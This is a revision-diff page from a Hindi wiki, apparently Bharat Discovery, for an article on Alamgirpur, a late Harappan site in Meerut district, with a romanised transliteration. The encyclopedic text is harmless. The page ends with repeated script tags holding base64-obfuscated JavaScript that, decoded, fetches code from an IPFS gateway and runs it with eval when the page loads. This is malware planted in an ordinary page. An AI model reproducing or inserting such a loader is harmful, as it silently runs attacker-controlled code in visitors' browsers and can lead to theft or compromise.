Difference between revisions of "आलमगीरपुर (मेरठ)"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "<references/> *पुस्तक- ऐतिहासिक स्थानावली, लेखक-विजयेन्द्र कुमार माथुर, प्रकाशन- राजस्थान ग्रंथ अका)
 
(2 intermediate revisions by the same user not shown)
Line 1: Line 1:
पश्चिम [[उत्तर प्रदेश]] के [[मेरठ ज़िला|मेरठ ज़िले]] में [[यमुना नदी|यमुना]] की सहायक हिण्डन नदी पर स्थित इस पुरास्थल की खोज 1958 में 'यज्ञ दत्त शर्मा' द्वारा की गयी। आलमीरपुर [[गंगा-यमुना दोआब|गंगा-यमुना]]  में पहला स्थल था जहां से [[हड़प्पा]] कालीन [[अवशेष]] प्रकाश में आए थे।  
+
पश्चिम [[उत्तर प्रदेश]] के [[मेरठ ज़िला|मेरठ ज़िले]] में [[यमुना नदी|यमुना]] की सहायक [[हिण्डन नदी]] पर स्थित इस पुरास्थल की खोज [[1958]] में 'यज्ञदत्त शर्मा' द्वारा की गयी। आलमीरपुर [[गंगा-यमुना दोआब|गंगा-यमुना]]  में पहला स्थल था जहां से [[हड़प्पा]] कालीन [[अवशेष]] प्रकाश में आए थे।  
  
 
यह [[हड़प्पा संस्कृति]] का सर्वाधिक पूर्वी पुरास्थल हैं। यह स्थल [[सिन्धु घाटी की सभ्यता|सैंधव सभ्यता]] की अन्तिम अवस्था को सूचित करता है।  
 
यह [[हड़प्पा संस्कृति]] का सर्वाधिक पूर्वी पुरास्थल हैं। यह स्थल [[सिन्धु घाटी की सभ्यता|सैंधव सभ्यता]] की अन्तिम अवस्था को सूचित करता है।  
  
यहाँ [[मिट्टी]] के बर्तन, मनके एवं पिण्ड मिले है। यहाँ एक गर्त से रोटी बेलने की चौकी तथा कटोरे के टुकड़े प्राप्त हुए है। किन्तु मातृदेवी की मूर्ति और मुद्रांएँ नहीं मिली है।
+
यहाँ [[मिट्टी]] के बर्तन, मनके एवं पिण्ड मिले है। यहाँ एक गर्त से '''रोटी बेलने की चौकी तथा कटोरे के टुकड़े''' प्राप्त हुए है। किन्तु मातृदेवी की मूर्ति और मुद्रांएँ नहीं मिली है।
  
 
{{लेख प्रगति
 
{{लेख प्रगति
Line 15: Line 15:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
*ऐतिहासिक स्थानावली | विजयेन्द्र कुमार माथुर |  वैज्ञानिक तथा तकनीकी शब्दावली आयोग | मानव संसाधन विकास मंत्रालय, भारत सरकार
+
 
  
 
==संबंधित लेख==
 
==संबंधित लेख==

Latest revision as of 12:39, 5 May 2018

pashchim uttar pradesh ke merath zile mean yamuna ki sahayak hindan nadi par sthit is purasthal ki khoj 1958 mean 'yajnadatt sharma' dvara ki gayi. alamirapur ganga-yamuna mean pahala sthal tha jahaan se h dappa kalin avashesh prakash mean ae the.

yah h dappa sanskriti ka sarvadhik poorvi purasthal haian. yah sthal saiandhav sabhyata ki antim avastha ko soochit karata hai.

yahaan mitti ke bartan, manake evan pind mile hai. yahaan ek gart se roti belane ki chauki tatha katore ke tuk de prapt hue hai. kintu matridevi ki moorti aur mudraanean nahian mili hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh


sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>